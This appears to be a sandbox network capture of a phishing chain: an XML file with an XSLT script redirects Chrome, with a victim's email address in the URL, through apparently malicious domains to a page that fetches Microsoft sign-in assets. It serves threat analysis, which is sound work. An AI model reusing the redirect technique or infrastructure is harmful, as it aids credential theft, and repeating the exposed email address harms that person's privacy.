                                Jan 14, 2025 04:33:37.465260983 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:37.465346098 CET49785443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:37.467688084 CET49785443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:37.467711926 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:38.154649973 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:38.165206909 CET49785443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:38.165239096 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:38.165776968 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:38.175209999 CET49785443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:38.175322056 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:38.175348043 CET49785443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:38.220525026 CET49785443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:38.220551968 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:45.631334066 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:45.637676001 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:45.637746096 CET49785443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:45.638151884 CET49785443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:45.638175011 CET44349785203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:45.641587973 CET49787443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:45.641634941 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:45.641712904 CET49787443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:45.641916037 CET49787443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:45.641935110 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:46.337758064 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:46.338257074 CET49787443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:46.338305950 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:46.338603020 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:46.343110085 CET49787443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:46.343195915 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:46.343301058 CET49787443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:46.387367010 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:46.609966993 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:46.610044956 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:46.610096931 CET49787443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:46.610423088 CET49787443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:46.610445976 CET44349787203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:52.616120100 CET49825443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:52.616218090 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:52.616292953 CET49825443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:52.616795063 CET49825443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:52.616832972 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:53.218871117 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:53.221617937 CET49825443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:53.221666098 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:53.222273111 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:53.234293938 CET49825443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:53.234473944 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:53.236460924 CET49825443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:33:53.279351950 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:33:55.405518055 CET49836443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:33:55.405550957 CET44349836216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:55.405620098 CET49836443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:33:55.405827045 CET49836443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:33:55.405836105 CET44349836216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:56.039551973 CET44349836216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:56.040266037 CET49836443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:33:56.040288925 CET44349836216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:56.040965080 CET44349836216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:56.041290045 CET49836443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:33:56.041389942 CET44349836216.58.206.68192.168.2.4
                                Jan 14, 2025 04:33:56.090955973 CET49836443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:33:58.087305069 CET4972480192.168.2.42.22.50.144
                                Jan 14, 2025 04:33:58.092431068 CET80497242.22.50.144192.168.2.4
                                Jan 14, 2025 04:33:58.092493057 CET4972480192.168.2.42.22.50.144
                                Jan 14, 2025 04:34:00.265676022 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.270648956 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.270852089 CET49825443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:00.271097898 CET49825443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:00.271137953 CET44349825203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.280298948 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:00.280364990 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.280590057 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:00.280725956 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:00.280741930 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.917191982 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.917566061 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:00.917604923 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.918700933 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.919125080 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:00.919284105 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:00.919301987 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:00.961143017 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:01.215694904 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:01.217530012 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:01.217825890 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:01.217825890 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:01.523571968 CET49866443192.168.2.4203.161.57.139
                                Jan 14, 2025 04:34:01.523644924 CET44349866203.161.57.139192.168.2.4
                                Jan 14, 2025 04:34:05.946424007 CET44349836216.58.206.68192.168.2.4
                                Jan 14, 2025 04:34:05.946615934 CET44349836216.58.206.68192.168.2.4
                                Jan 14, 2025 04:34:05.946873903 CET49836443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:34:05.994992018 CET49836443192.168.2.4216.58.206.68
                                Jan 14, 2025 04:34:05.995055914 CET44349836216.58.206.68192.168.2.4
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 14, 2025 04:32:51.538485050 CET53590471.1.1.1192.168.2.4
                                Jan 14, 2025 04:32:51.671931982 CET53589411.1.1.1192.168.2.4
                                Jan 14, 2025 04:32:52.711838007 CET53652911.1.1.1192.168.2.4
                                Jan 14, 2025 04:32:55.353288889 CET6542053192.168.2.41.1.1.1
                                Jan 14, 2025 04:32:55.353410006 CET6471453192.168.2.41.1.1.1
                                Jan 14, 2025 04:32:55.360217094 CET53654201.1.1.1192.168.2.4
                                Jan 14, 2025 04:32:55.360382080 CET53647141.1.1.1192.168.2.4
                                Jan 14, 2025 04:32:57.430315971 CET5088653192.168.2.41.1.1.1
                                Jan 14, 2025 04:32:57.430453062 CET6065953192.168.2.41.1.1.1
                                Jan 14, 2025 04:32:57.449320078 CET53508861.1.1.1192.168.2.4
                                Jan 14, 2025 04:32:57.451647043 CET53606591.1.1.1192.168.2.4
                                Jan 14, 2025 04:32:59.185585976 CET5176753192.168.2.41.1.1.1
                                Jan 14, 2025 04:32:59.185756922 CET6205853192.168.2.41.1.1.1
                                Jan 14, 2025 04:32:59.442790031 CET53620581.1.1.1192.168.2.4
                                Jan 14, 2025 04:32:59.640685081 CET53517671.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:00.319997072 CET5740453192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:00.320117950 CET5307153192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:00.381385088 CET53574041.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:00.648117065 CET53530711.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:01.345968008 CET5167253192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:01.346080065 CET6387053192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:01.400947094 CET53516721.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:01.401542902 CET53638701.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:02.913408041 CET5716753192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:02.913563967 CET5478153192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:02.920377970 CET53571671.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:02.920598030 CET53547811.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:03.546566963 CET6092853192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:03.546689034 CET5088053192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:03.553347111 CET53609281.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:03.553986073 CET53508801.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:07.122673035 CET6212553192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:07.122791052 CET5239653192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:07.228410006 CET53569951.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:07.936028004 CET5961453192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:07.936028004 CET5511753192.168.2.41.1.1.1
                                Jan 14, 2025 04:33:09.671514988 CET138138192.168.2.4192.168.2.255
                                Jan 14, 2025 04:33:09.781893015 CET53570181.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:28.549057007 CET53538131.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:51.239120007 CET53496071.1.1.1192.168.2.4
                                Jan 14, 2025 04:33:51.516705990 CET53614541.1.1.1192.168.2.4
                                TimestampSource IPDest IPChecksumCodeType
                                Jan 14, 2025 04:33:00.648473024 CET192.168.2.41.1.1.1c240(Port unreachable)Destination Unreachable
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jan 14, 2025 04:32:55.353288889 CET192.168.2.41.1.1.10x9898Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:32:55.353410006 CET192.168.2.41.1.1.10xb0Standard query (0)www.google.com65IN (0x0001)false
                                Jan 14, 2025 04:32:57.430315971 CET192.168.2.41.1.1.10xd78cStandard query (0)bebizicon.comA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:32:57.430453062 CET192.168.2.41.1.1.10x6b9bStandard query (0)bebizicon.com65IN (0x0001)false
                                Jan 14, 2025 04:32:59.185585976 CET192.168.2.41.1.1.10x1052Standard query (0)mudedevidaparasempre.com.brA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:32:59.185756922 CET192.168.2.41.1.1.10xc2c5Standard query (0)mudedevidaparasempre.com.br65IN (0x0001)false
                                Jan 14, 2025 04:33:00.319997072 CET192.168.2.41.1.1.10x9f63Standard query (0)e2dpryeqzl.jappeckino.shopA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:00.320117950 CET192.168.2.41.1.1.10xc01eStandard query (0)e2dpryeqzl.jappeckino.shop65IN (0x0001)false
                                Jan 14, 2025 04:33:01.345968008 CET192.168.2.41.1.1.10x4fcbStandard query (0)e2dpryeqzl.jappeckino.shopA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:01.346080065 CET192.168.2.41.1.1.10x8304Standard query (0)e2dpryeqzl.jappeckino.shop65IN (0x0001)false
                                Jan 14, 2025 04:33:02.913408041 CET192.168.2.41.1.1.10x9061Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:02.913563967 CET192.168.2.41.1.1.10xeae8Standard query (0)api.ipify.org65IN (0x0001)false
                                Jan 14, 2025 04:33:03.546566963 CET192.168.2.41.1.1.10x8a9aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:03.546689034 CET192.168.2.41.1.1.10x967bStandard query (0)api.ipify.org65IN (0x0001)false
                                Jan 14, 2025 04:33:07.122673035 CET192.168.2.41.1.1.10xb38aStandard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:07.122791052 CET192.168.2.41.1.1.10xa618Standard query (0)aadcdn.msauthimages.net65IN (0x0001)false
                                Jan 14, 2025 04:33:07.936028004 CET192.168.2.41.1.1.10x9cd9Standard query (0)aadcdn.msauthimages.netA (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:07.936028004 CET192.168.2.41.1.1.10x325aStandard query (0)aadcdn.msauthimages.net65IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jan 14, 2025 04:32:55.360217094 CET1.1.1.1192.168.2.40x9898No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:32:55.360382080 CET1.1.1.1192.168.2.40xb0No error (0)www.google.com65IN (0x0001)false
                                Jan 14, 2025 04:32:57.449320078 CET1.1.1.1192.168.2.40xd78cNo error (0)bebizicon.com70.32.23.62A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:32:59.640685081 CET1.1.1.1192.168.2.40x1052No error (0)mudedevidaparasempre.com.br108.167.132.194A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:00.381385088 CET1.1.1.1192.168.2.40x9f63No error (0)e2dpryeqzl.jappeckino.shop203.161.57.139A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:01.400947094 CET1.1.1.1192.168.2.40x4fcbNo error (0)e2dpryeqzl.jappeckino.shop203.161.57.139A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:02.920377970 CET1.1.1.1192.168.2.40x9061No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:02.920377970 CET1.1.1.1192.168.2.40x9061No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:02.920377970 CET1.1.1.1192.168.2.40x9061No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:02.920598030 CET1.1.1.1192.168.2.40xeae8No error (0)api.ipify.org65IN (0x0001)false
                                Jan 14, 2025 04:33:03.553347111 CET1.1.1.1192.168.2.40x8a9aNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:03.553347111 CET1.1.1.1192.168.2.40x8a9aNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:03.553347111 CET1.1.1.1192.168.2.40x8a9aNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:03.553986073 CET1.1.1.1192.168.2.40x967bNo error (0)api.ipify.org65IN (0x0001)false
                                Jan 14, 2025 04:33:07.128293991 CET1.1.1.1192.168.2.40xc375No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Jan 14, 2025 04:33:07.128293991 CET1.1.1.1192.168.2.40xc375No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:07.130110025 CET1.1.1.1192.168.2.40xa618No error (0)aadcdn.msauthimages.netaadcdn-msft.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                Jan 14, 2025 04:33:07.130346060 CET1.1.1.1192.168.2.40xb38aNo error (0)aadcdn.msauthimages.netaadcdn-msft.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                Jan 14, 2025 04:33:07.130346060 CET1.1.1.1192.168.2.40xb38aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Jan 14, 2025 04:33:07.130346060 CET1.1.1.1192.168.2.40xb38aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:07.943341017 CET1.1.1.1192.168.2.40x9cd9No error (0)aadcdn.msauthimages.netaadcdn-msft.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                Jan 14, 2025 04:33:07.943341017 CET1.1.1.1192.168.2.40x9cd9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Jan 14, 2025 04:33:07.943341017 CET1.1.1.1192.168.2.40x9cd9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                Jan 14, 2025 04:33:07.943473101 CET1.1.1.1192.168.2.40x325aNo error (0)aadcdn.msauthimages.netaadcdn-msft.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                Jan 14, 2025 04:33:08.171664000 CET1.1.1.1192.168.2.40x906bNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                Jan 14, 2025 04:33:08.171664000 CET1.1.1.1192.168.2.40x906bNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                • bebizicon.com
                                  • mudedevidaparasempre.com.br
                                • https:
                                  • e2dpryeqzl.jappeckino.shop
                                  • api.ipify.org
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.44974070.32.23.62804176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                Jan 14, 2025 04:32:57.457262039 CET447OUTGET /Campususa/index.xml HTTP/1.1
                                Host: bebizicon.com
                                Connection: keep-alive
                                Upgrade-Insecure-Requests: 1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Encoding: gzip, deflate
                                Accept-Language: en-US,en;q=0.9
                                Jan 14, 2025 04:32:57.976123095 CET534INHTTP/1.1 200 OK
                                Connection: Keep-Alive
                                Keep-Alive: timeout=5, max=100
                                content-type: application/xml
                                last-modified: Mon, 13 Jan 2025 18:00:45 GMT
                                accept-ranges: bytes
                                content-length: 103
                                date: Tue, 14 Jan 2025 03:32:57 GMT
                                server: LiteSpeed
                                strict-transport-security: max-age=63072000; includeSubDomains
                                x-frame-options: SAMEORIGIN
                                x-content-type-options: nosniff
                                cache-control: max-age=3600, public, must-revalidate
                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 3f 78 6d 6c 2d 73 74 79 6c 65 73 68 65 65 74 20 74 79 70 65 3d 22 74 65 78 74 2f 78 73 6c 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 78 73 6c 74 22 3f 3e 0d 0a 3c 72 6f 6f 74 2f 3e 0d 0a
                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="index.xslt"?><root/>
                                Jan 14, 2025 04:32:57.992507935 CET352OUTGET /Campususa/index.xslt HTTP/1.1
                                Host: bebizicon.com
                                Connection: keep-alive
                                Accept: text/css,*/*;q=0.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Referer: http://bebizicon.com/Campususa/index.xml
                                Accept-Encoding: gzip, deflate
                                Accept-Language: en-US,en;q=0.9
                                Jan 14, 2025 04:32:58.108392954 CET1236INHTTP/1.1 200 OK
                                Connection: Keep-Alive
                                Keep-Alive: timeout=5, max=100
                                content-type: application/xslt+xml
                                last-modified: Mon, 13 Jan 2025 20:18:22 GMT
                                accept-ranges: bytes
                                content-length: 1850
                                date: Tue, 14 Jan 2025 03:32:58 GMT
                                server: LiteSpeed
                                strict-transport-security: max-age=63072000; includeSubDomains
                                x-frame-options: SAMEORIGIN
                                x-content-type-options: nosniff
                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 78 73 6c 3a 73 74 79 6c 65 73 68 65 65 74 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 78 73 6c 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 58 53 4c 2f 54 72 61 6e 73 66 6f 72 6d 22 3e 0d 0a 20 20 20 20 3c 78 73 6c 3a 74 65 6d 70 6c 61 74 65 20 6d 61 74 63 68 3d 22 2f 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <html lang="en"> <head> <meta charset="UTF-8"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <title>File loading</title> <script> <![CDATA[ // Function to get the value of a parameter from the URL function getParameterByName(name, url) { if (!url) url = window.location.href; name = name.replace(/[\[\]]/g, "\\$&"); var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"), results = regex.ex
                                Jan 14, 2025 04:32:58.108458996 CET997INData Raw: 65 63 28 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 72 65 73 75 6c 74 73 29 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                Data Ascii: ec(url); if (!results) return null; if (!results[2]) return ''; return decodeURIComponent(results[2].replace(/\+/g, " ")); }
                                Jan 14, 2025 04:32:58.140731096 CET389OUTGET /favicon.ico HTTP/1.1
                                Host: bebizicon.com
                                Connection: keep-alive
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                Referer: http://bebizicon.com/Campususa/index.xml
                                Accept-Encoding: gzip, deflate
                                Accept-Language: en-US,en;q=0.9
                                Jan 14, 2025 04:32:58.254451036 CET1196INHTTP/1.1 404 Not Found
                                Connection: Keep-Alive
                                Keep-Alive: timeout=5, max=100
                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                pragma: no-cache
                                content-type: text/html
                                content-length: 796
                                date: Tue, 14 Jan 2025 03:32:58 GMT
                                server: LiteSpeed
                                strict-transport-security: max-age=63072000; includeSubDomains
                                x-frame-options: SAMEORIGIN
                                x-content-type-options: nosniff
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449743108.167.132.1944434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:00 UTC736OUTGET /index5759912.htm?email=olivier.dozat@innocap.com HTTP/1.1
                                Host: mudedevidaparasempre.com.br
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                sec-ch-ua-platform: "Windows"
                                Upgrade-Insecure-Requests: 1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: navigate
                                Sec-Fetch-Dest: document
                                Referer: http://bebizicon.com/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:00 UTC259INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:00 GMT
                                Server: nginx/1.23.4
                                Content-Type: text/html
                                Content-Length: 9804
                                Last-Modified: Mon, 13 Jan 2025 20:17:29 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                X-Server-Cache: true
                                X-Proxy-Cache: MISS
